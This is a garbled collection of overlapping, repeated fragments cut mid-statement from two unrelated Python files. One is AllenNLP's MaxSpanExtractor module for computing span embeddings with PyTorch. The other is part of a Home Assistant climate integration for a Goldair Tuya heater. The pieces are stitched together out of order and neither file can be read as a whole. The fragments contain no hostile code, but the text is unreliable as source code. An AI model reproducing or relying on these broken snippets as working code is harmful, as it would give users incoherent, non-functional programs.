embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None", "\"To use a span width embedding representation, you must\" \"specify both num_width_buckets and", "strictly necessary to multiply the span indices by the mask here, # but", "here, # but it's possible that the span representation was padded with something", "# set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size,", "the span widths and concatenate to the rest of the representations. if self._bucket_widths:", "self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends", "be safe. span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask #", "but it's possible that the span representation was padded with something other #", "concatenate to the rest of the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends", "ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim:", "sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, )", "span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not", "of the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings )", "must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self)", "torch from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor", "= num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is", "from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class", "None, span_width_embedding_dim: int = None, bucket_widths: bool = False, ) -> None: super().__init__()", "is not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a", "= False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths", "the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else:", "import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None,", "span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not", "= None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans)", "span_width_embedding_dim: int = None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim", "span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask", "= input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None", "= Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is", "embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding =", "num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int: return", "and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim", "you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def", "else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) ->", "None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1,", "int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides", "import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import", "invalid index), so we do so anyway to # be safe. span_starts =", "multiply the span indices by the mask here, # but it's possible that", "return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim", "not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span", "span indices by the mask here, # but it's possible that the span", "something other # than 0 (such as -1, which would be an invalid", "int = None, span_width_embedding_dim: int = None, bucket_widths: bool = False, ) ->", "+ self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask:", "= None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1)", "* span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings,", "representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None", "None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans) span_starts,", "to multiply the span indices by the mask here, # but it's possible", "int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None: return", "span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings =", "indices by the mask here, # but it's possible that the span representation", "representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths", "it's possible that the span representation was padded with something other # than", "self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None,", "None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif", "None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or", "(batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask", "2)[0] # span_mask if self._span_width_embedding is not None: # Embed the span widths", "from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from", "bool = False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings", "emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: #", "span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices)", "is not None: # Embed the span widths and concatenate to the rest", "span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings * span_indices_mask.unsqueeze(-1) return span_max_embeddings", "if self._span_width_embedding is not None: # Embed the span widths and concatenate to", "self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim +", "not None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim )", "the span representation was padded with something other # than 0 (such as", "__init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths:", "with something other # than 0 (such as -1, which would be an", "self._span_width_embedding is not None: # Embed the span widths and concatenate to the", "unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size]", "possible that the span representation was padded with something other # than 0", "self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool", "span width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else:", "which would be an invalid index), so we do so anyway to #", "be an invalid index), so we do so anyway to # be safe.", "span_mask if self._span_width_embedding is not None: # Embed the span widths and concatenate", "- span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is", "-> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in", "is not None: raise ConfigurationError( \"To use a span width embedding representation, you", "from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self,", "= torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: # Embed the", "# Embed the span widths and concatenate to the rest of the representations.", "span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings = span_embeddings", "Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding", "span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span width embedding representation,", "both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int:", "is not None: # It's not strictly necessary to multiply the span indices", "span representation was padded with something other # than 0 (such as -1,", "-1, which would be an invalid index), so we do so anyway to", "anyway to # be safe. span_starts = span_starts * span_indices_mask span_ends = span_ends", "# be safe. span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask", "int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool = False,", "span_indices_mask is not None: # It's not strictly necessary to multiply the span", "0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings,", "= bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding", "None: # It's not strictly necessary to multiply the span indices by the", "from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from", "import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import", "self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim", "the span indices by the mask here, # but it's possible that the", "# span_mask if self._span_width_embedding is not None: # Embed the span widths and", "return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices:", "if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def", "span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0]", "self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not", "= None, span_width_embedding_dim: int = None, bucket_widths: bool = False, ) -> None:", ") -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths", "not None: # Embed the span widths and concatenate to the rest of", "not None: raise ConfigurationError( \"To use a span width embedding representation, you must\"", "and concatenate to the rest of the representations. if self._bucket_widths: span_widths = util.bucket_values(", "Embed the span widths and concatenate to the rest of the representations. if", "allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int =", "if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths =", "is not None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim", "= self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return", ") -> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index", "import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import", "embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is not None: raise", "from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int", "None: raise ConfigurationError( \"To use a span width embedding representation, you must\" \"specify", "(such as -1, which would be an invalid index), so we do so", "= span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width,", "emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings", "# shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)]", "the rest of the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts,", "self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings", "raise ConfigurationError( \"To use a span width embedding representation, you must\" \"specify both", "span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set", "span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None:", "self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and span_width_embedding_dim", "self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int:", "[batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings", "is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not", "= None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim = input_dim", "not None: # It's not strictly necessary to multiply the span indices by", "max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0", "rest of the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings", "num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is not", "= None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if", "span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None:", "span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding", "Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is not", "span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask", "self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward(", "safe. span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size,", "num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is not None:", "= util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings = span_embeddings *", "int = None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim =", "bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings =", "span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def", "was padded with something other # than 0 (such as -1, which would", "that the span representation was padded with something other # than 0 (such", "allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor):", ") elif num_width_embeddings is not None or span_width_embedding_dim is not None: raise ConfigurationError(", "return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor =", "0 (such as -1, which would be an invalid index), so we do", "-> int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim", "width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding", "None: # Embed the span widths and concatenate to the rest of the", "to # be safe. span_starts = span_starts * span_indices_mask span_ends = span_ends *", "= span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if", "as -1, which would be an invalid index), so we do so anyway", "index), so we do so anyway to # be safe. span_starts = span_starts", "span_indices) # set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() #", ") else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings,", "span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1)", "the mask here, # but it's possible that the span representation was padded", "is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self,", "input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and", "get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not", "do so anyway to # be safe. span_starts = span_starts * span_indices_mask span_ends", "torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None: #", "[batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not", "SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError" ]
[]
[ "power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode", "not None: self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE)) def set_target_temperature(self, target_temperature): target_temperature = int(round(target_temperature)) preset_mode = self.preset_mode if", "def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return list(PRESET_MODE_TO_DPS_MODE.keys()) def set_preset_mode(self,", "ATTR_TARGET_TEMPERATURE = 'target_temperature' ATTR_CHILD_LOCK = 'child_lock' ATTR_FAULT = 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER", "'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID", "= { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = { STATE_COMFORT: 'C', STATE_ECO:", "# _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the correct PROPERTY_TO_DPS_ID depending", "return None @property def preset_modes(self): \"\"\"Return the list of available preset modes.\"\"\" return", "None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode):", "def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self,", "PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5', ATTR_CHILD_LOCK: '2',", "PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property", "'max': 21 } } # self._model = model # _LOGGER.info(f'Setting model to {model}')", "\"\"\"Set new power level.\"\"\" new_level = swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise", "= 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco'", "swing_mode(self): \"\"\"Return the power level.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return", "@property def supported_features(self): \"\"\"Return the list of supported features.\"\"\" return self._support_flags @property def", "def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self, swing_mode): \"\"\"Set new", "of available HVAC modes.\"\"\" return list(HVAC_MODE_TO_DPS_MODE.keys()) def set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\"", "temperature_unit(self): \"\"\"Return the unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the", "'1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101',", "'5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class", "set_hvac_mode(self, hvac_mode): \"\"\"Set new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def", "== STATE_ECO: return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE]) else: return None @property def target_temperature_step(self): \"\"\"Return the supported", "minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None", "ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE =", "'104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE:", "return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def set_swing_mode(self,", "self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new", "else: return None @property def swing_modes(self): \"\"\"List of power levels.\"\"\" return list(POWER_LEVEL_TO_DPS_LEVEL.keys()) def", "ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE: '4', ATTR_CHILD_LOCK: '6', ATTR_FAULT: '12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON:", "dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode from api status.", "list(self.get_property_to_dps_id) if dps_mode not in keys: _LOGGER.debug(f'Could not load correct preset mode from", "swing_mode if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys(): raise ValueError(f'Invalid power level: {new_level}') dps_level =", "self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode) else: return STATE_UNAVAILABLE @property", "return STATE_UNAVAILABLE @property def hvac_modes(self): \"\"\"Return the list of available HVAC modes.\"\"\" return", "+ ATTR_TARGET_TEMPERATURE STATE_COMFORT = 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID =", "min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min']", "!= STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return None def set_temperature(self, **kwargs): \"\"\"Set new target", "@property def current_temperature(self): \"\"\"Return the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return", "the maximum temperature.\"\"\" if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['max'] else: return", "if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode) else: return None @property def", "21 } } # self._model = model # _LOGGER.info(f'Setting model to {model}') @property", "ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF:", "WiFi Heater device. \"\"\" import logging import json from homeassistant.const import ( ATTR_TEMPERATURE,", "ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE", "PROPERTY_TO_DPS_ID_GECO270 else: return PROPERTY_TO_DPS_ID @property def supported_features(self): \"\"\"Return the list of supported features.\"\"\"", "\"\"\"Return the temperature we try to reach.\"\"\" if self.preset_mode == STATE_COMFORT: return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE])", "'3', '4': '4', '5': '5', 'Auto': 'auto' } SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE", "self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self): \"\"\"Return the", "return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try to reach.\"\"\" if", "self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE: return self._TEMPERATURE_LIMITS[self.preset_mode]['min'] else: return None @property def max_temp(self):", "temperature.\"\"\" return self._TEMPERATURE_STEP @property def min_temp(self): \"\"\"Return the minimum temperature.\"\"\" if self.preset_mode and", "STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '2', ATTR_TEMPERATURE: '3', ATTR_PRESET_MODE:", "= 'Comfort' STATE_ECO = 'Eco' STATE_ANTI_FREEZE = 'Anti-freeze' PROPERTY_TO_DPS_ID = { ATTR_HVAC_MODE: '1',", "return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie Heat or Off.\"\"\"", "= self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE]) if dps_mode == ATTR_POWER_MODE_USER: return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL]) elif dps_mode == ATTR_POWER_MODE_AUTO: return", "Anti-freeze mode.') limits = self._TEMPERATURE_LIMITS[preset_mode] if not limits['min'] <= target_temperature <= limits['max']: raise", "} SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE class GoldairHeater(ClimateDevice): \"\"\"Representation of a", "must be between ' f'{limits[\"min\"]} and {limits[\"max\"]}' ) if preset_mode == STATE_COMFORT: self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE],", "new HVAC mode.\"\"\" dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode] self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode) @property def preset_mode(self): \"\"\"Return current", "'ECO', STATE_ANTI_FREEZE: 'AF' } POWER_LEVEL_TO_DPS_LEVEL = { 'Stop': 'stop', '1': '1', '2': '2',", "import ( ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import", "Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE,", "GOLDAIR GECO270 PROPERTY_TO_DPS_ID_GECO270 = { ATTR_HVAC_MODE: '1', ATTR_TARGET_TEMPERATURE: '3', ATTR_TEMPERATURE: '4', ATTR_PRESET_MODE: '5',", "'106' } HVAC_MODE_TO_DPS_MODE = { HVAC_MODE_OFF: False, HVAC_MODE_HEAT: True } PRESET_MODE_TO_DPS_MODE = {", "= 1 self._TEMPERATURE_LIMITS = { STATE_COMFORT: { 'min': 5, 'max': 37 }, STATE_ECO:", "self._model = model # _LOGGER.info(f'Setting model to {model}') @property def get_property_to_dps_id(self): \"\"\"Get the", "'12', ATTR_POWER_LEVEL: '101', ATTR_DISPLAY_ON: '104', ATTR_POWER_MODE: '105', ATTR_ECO_TARGET_TEMPERATURE: '106' } # GOLDAIR GECO270", "unit of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try", "target temperatures.\"\"\" if kwargs.get(ATTR_PRESET_MODE) is not None: self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE)) if kwargs.get(ATTR_TEMPERATURE) is not None:", "features.\"\"\" return self._support_flags @property def should_poll(self): \"\"\"Return the polling state.\"\"\" return True @property", "= 'power_level' ATTR_DISPLAY_ON = 'display_on' ATTR_POWER_MODE = 'power_mode' ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE", "= 'fault' ATTR_POWER_MODE_AUTO = 'auto' ATTR_POWER_MODE_USER = 'user' ATTR_POWER_LEVEL = 'power_level' ATTR_DISPLAY_ON =", "ie Heat or Off.\"\"\" dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE]) if dps_mode is not None: return", "\"\"\"Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater you have\"\"\"", "dps_mode) @property def preset_mode(self): \"\"\"Return current preset mode, ie Comfort, Eco, Anti-freeze.\"\"\" dps_mode", "the current temperature.\"\"\" return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE]) @property def hvac_mode(self): \"\"\"Return current HVAC mode, ie", "STATE_UNAVAILABLE ) from homeassistant.components.climate import ClimateDevice from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, ATTR_PRESET_MODE, HVAC_MODE_OFF,", "of measurement.\"\"\" return self._device.temperature_unit @property def target_temperature(self): \"\"\"Return the temperature we try to", "of the climate device.\"\"\" return self._device.name @property def temperature_unit(self): \"\"\"Return the unit of", "modes.\"\"\" return 